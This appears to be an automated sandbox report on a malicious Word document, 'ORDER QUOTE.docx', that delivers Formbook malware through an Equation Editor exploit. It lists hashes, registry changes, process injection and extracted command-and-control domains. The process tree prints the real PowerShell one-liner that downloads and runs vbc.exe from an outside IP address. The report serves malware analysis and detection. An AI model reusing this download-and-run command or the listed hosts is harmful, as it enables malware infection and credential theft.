Analysis
-
max time kernel
150s -
max time network
157s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
22-09-2021 20:12
Static task
static1
Behavioral task
behavioral1
Sample
ORDER QUOTE.docx
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
ORDER QUOTE.docx
Resource
win10v20210408
General
-
Target
ORDER QUOTE.docx
-
Size
10KB
-
MD5
eee70c12ab889fd6173de81fbc9a6817
-
SHA1
673a841da220e5ba72e5f30d1d566569595ed352
-
SHA256
7c41d53d6dd4f2979bfcdea462feef025b2f31cf55644f927ece5f4699a1b7a9
-
SHA512
7647f0d5adcd468a6cbae4900ecb2887de0a0f89ba25893379f905f04b7b9ee0fa89af755c8cb1db8e4d613f11a8f9f80334de3e784677d1fac1ad51cc9db8d7
Malware Config
Extracted
http://198.46.199.161/joo/vbc.exe
Extracted
formbook
4.1
m8g0
http://www.psicologarenatacruz.com/m8g0/
trypapaya.pro
instructorcornernet.com
techadvisorsfl.com
raunnan.com
filestune.com
learnitanywhereskills.com
beaullife.com
getcovidwear.com
tkrbeautyinstitut.com
lisaphamkhai.com
iconicdds.com
ksoopawlas.com
testosteron.store
jctaketwo.com
awexz.online
onlinening.com
steelwerkschicago.com
lukakordic.com
expertsofcoaching.com
dashcca.com
xn--demiatdirecto-1ib.com
yuhongicm.com
portlandsiege.com
academysta.com
blackwiremedia.com
kent-ro-service.com
awmarkets.com
speleatherware.com
rehabcenters.space
jioscircle.com
sinijitu.com
analyticsyoda.com
shlqjt.com
bikramyogamarietta.com
crowncasino9.com
smokin-balls.com
shirasu-clinic.com
856379912.xyz
ckatesting.club
dideqsa.com
goodreporters.com
bromosyon.com
ilkonceyayincilik.com
domennyarendi32.net
thegrowthinn.com
qsgasia.com
venolbolivia.com
myhalloweengift.com
deeparchivesport.com
stiltedstories.com
btcdonation.info
little-darling.com
maximumpotentialfitness.net
iading.com
datingwithgusto.com
abncustompainting.com
cropadvisorjobs.com
nanoring.info
best-practice-gastro.com
sellitech.net
mixonsolutions.com
throughthelineagency.com
gtat.pro
relicstudios.net
Signatures
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Formbook Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1732-88-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral1/memory/1732-89-0x000000000041F1B0-mapping.dmp formbook behavioral1/memory/1032-98-0x00000000000C0000-0x00000000000EF000-memory.dmp formbook -
Blocklisted process makes network request 2 IoCs
Processes:
EQNEDT32.EXEpowershell.exeflow pid process 11 572 EQNEDT32.EXE 12 1748 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
regasm.exevbc.exevbc.exepid process 1812 regasm.exe 1472 vbc.exe 1732 vbc.exe -
Abuses OpenXML format to download file from external location 2 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key opened \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\Common\Offline\Files\http://cml.lol/olxqqy WINWORD.EXE -
Loads dropped DLL 4 IoCs
Processes:
EQNEDT32.EXEpowershell.exevbc.exepid process 572 EQNEDT32.EXE 572 EQNEDT32.EXE 1592 powershell.exe 1472 vbc.exe -
Uses the VBS compiler for execution 1 TTPs
-
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
vbc.exevbc.exeNETSTAT.EXEdescription pid process target process PID 1472 set thread context of 1732 1472 vbc.exe vbc.exe PID 1732 set thread context of 1264 1732 vbc.exe Explorer.EXE PID 1732 set thread context of 1264 1732 vbc.exe Explorer.EXE PID 1032 set thread context of 1264 1032 NETSTAT.EXE Explorer.EXE -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
NETSTAT.EXEpid process 1032 NETSTAT.EXE -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1104 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exepowershell.exevbc.exeNETSTAT.EXEpid process 1748 powershell.exe 1592 powershell.exe 1592 powershell.exe 1592 powershell.exe 1732 vbc.exe 1732 vbc.exe 1732 vbc.exe 1032 NETSTAT.EXE 1032 NETSTAT.EXE 1032 NETSTAT.EXE 1032 NETSTAT.EXE 1032 NETSTAT.EXE 1032 NETSTAT.EXE 1032 NETSTAT.EXE 1032 NETSTAT.EXE 1032 NETSTAT.EXE 1032 NETSTAT.EXE 1032 NETSTAT.EXE 1032 NETSTAT.EXE 1032 NETSTAT.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1264 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
vbc.exeNETSTAT.EXEpid process 1732 vbc.exe 1732 vbc.exe 1732 vbc.exe 1732 vbc.exe 1032 NETSTAT.EXE 1032 NETSTAT.EXE -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exepowershell.exevbc.exeNETSTAT.EXEExplorer.EXEWINWORD.EXEdescription pid process Token: SeDebugPrivilege 1748 powershell.exe Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 1732 vbc.exe Token: SeDebugPrivilege 1032 NETSTAT.EXE Token: SeShutdownPrivilege 1264 Explorer.EXE Token: SeShutdownPrivilege 1104 WINWORD.EXE Token: SeShutdownPrivilege 1264 Explorer.EXE Token: SeShutdownPrivilege 1264 Explorer.EXE Token: SeShutdownPrivilege 1264 Explorer.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Explorer.EXEpid process 1264 Explorer.EXE 1264 Explorer.EXE -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
Explorer.EXEpid process 1264 Explorer.EXE 1264 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1104 WINWORD.EXE 1104 WINWORD.EXE -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
EQNEDT32.EXEWINWORD.EXEregasm.execmd.exepowershell.exevbc.exevbc.exeNETSTAT.EXEdescription pid process target process PID 572 wrote to memory of 1812 572 EQNEDT32.EXE regasm.exe PID 572 wrote to memory of 1812 572 EQNEDT32.EXE regasm.exe PID 572 wrote to memory of 1812 572 EQNEDT32.EXE regasm.exe PID 572 wrote to memory of 1812 572 EQNEDT32.EXE regasm.exe PID 1104 wrote to memory of 1180 1104 WINWORD.EXE splwow64.exe PID 1104 wrote to memory of 1180 1104 WINWORD.EXE splwow64.exe PID 1104 wrote to memory of 1180 1104 WINWORD.EXE splwow64.exe PID 1104 wrote to memory of 1180 1104 WINWORD.EXE splwow64.exe PID 1812 wrote to memory of 376 1812 regasm.exe cmd.exe PID 1812 wrote to memory of 376 1812 regasm.exe cmd.exe PID 1812 wrote to memory of 376 1812 regasm.exe cmd.exe PID 1812 wrote to memory of 376 1812 regasm.exe cmd.exe PID 376 wrote to memory of 1748 376 cmd.exe powershell.exe PID 376 wrote to memory of 1748 376 cmd.exe powershell.exe PID 376 wrote to memory of 1748 376 cmd.exe powershell.exe PID 376 wrote to memory of 1748 376 cmd.exe powershell.exe PID 376 wrote to memory of 1592 376 cmd.exe powershell.exe PID 376 wrote to memory of 1592 376 cmd.exe powershell.exe PID 376 wrote to memory of 1592 376 cmd.exe powershell.exe PID 376 wrote to memory of 1592 376 cmd.exe powershell.exe PID 1592 wrote to memory of 1472 1592 powershell.exe vbc.exe PID 1592 wrote to memory of 1472 1592 powershell.exe vbc.exe PID 1592 wrote to memory of 1472 1592 powershell.exe vbc.exe PID 1592 wrote to memory of 1472 1592 powershell.exe vbc.exe PID 1472 wrote to memory of 1732 1472 vbc.exe vbc.exe PID 1472 wrote to memory of 1732 1472 vbc.exe vbc.exe PID 1472 wrote to memory of 1732 1472 vbc.exe vbc.exe PID 1472 wrote to memory of 1732 1472 vbc.exe vbc.exe PID 1472 wrote to memory of 1732 1472 vbc.exe vbc.exe PID 1472 wrote to memory of 1732 1472 vbc.exe vbc.exe PID 1472 wrote to memory of 1732 1472 vbc.exe vbc.exe PID 1732 wrote to memory of 1032 1732 vbc.exe NETSTAT.EXE PID 1732 wrote to memory of 1032 1732 vbc.exe NETSTAT.EXE PID 1732 wrote to memory of 1032 1732 vbc.exe NETSTAT.EXE PID 1732 wrote to memory of 1032 1732 vbc.exe NETSTAT.EXE PID 1032 wrote to memory of 1120 1032 NETSTAT.EXE cmd.exe PID 1032 wrote to memory of 1120 1032 NETSTAT.EXE cmd.exe PID 1032 wrote to memory of 1120 1032 NETSTAT.EXE cmd.exe PID 1032 wrote to memory of 1120 1032 NETSTAT.EXE cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ORDER QUOTE.docx"2⤵
- Abuses OpenXML format to download file from external location
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122883⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\regasm.exe"C:\Users\Public\regasm.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c powershell "(New-Object System.Net.WebClient).DownloadFile('http://198.46.199.161/joo/vbc.exe', (Join-Path -Path $env:Temp -ChildPath 'vbc.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'vbc.exe')" & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "(New-Object System.Net.WebClient).DownloadFile('http://198.46.199.161/joo/vbc.exe', (Join-Path -Path $env:Temp -ChildPath 'vbc.exe'))"4⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'vbc.exe')"4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\vbc.exe"C:\Users\Admin\AppData\Local\Temp\vbc.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\vbc.exe"C:\Users\Admin\AppData\Local\Temp\vbc.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\NETSTAT.EXE"C:\Windows\SysWOW64\NETSTAT.EXE"7⤵
- Suspicious use of SetThreadContext
- Gathers network information
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\vbc.exe"8⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\vbc.exeMD5
3dac10541270990e15c8742b0cd6f153
SHA1ed5c87e500c51e055ddb9160929a3dac51d3a393
SHA256744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f
SHA51266f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1
-
C:\Users\Admin\AppData\Local\Temp\vbc.exeMD5
3dac10541270990e15c8742b0cd6f153
SHA1ed5c87e500c51e055ddb9160929a3dac51d3a393
SHA256744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f
SHA51266f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1
-
C:\Users\Admin\AppData\Local\Temp\vbc.exeMD5
3dac10541270990e15c8742b0cd6f153
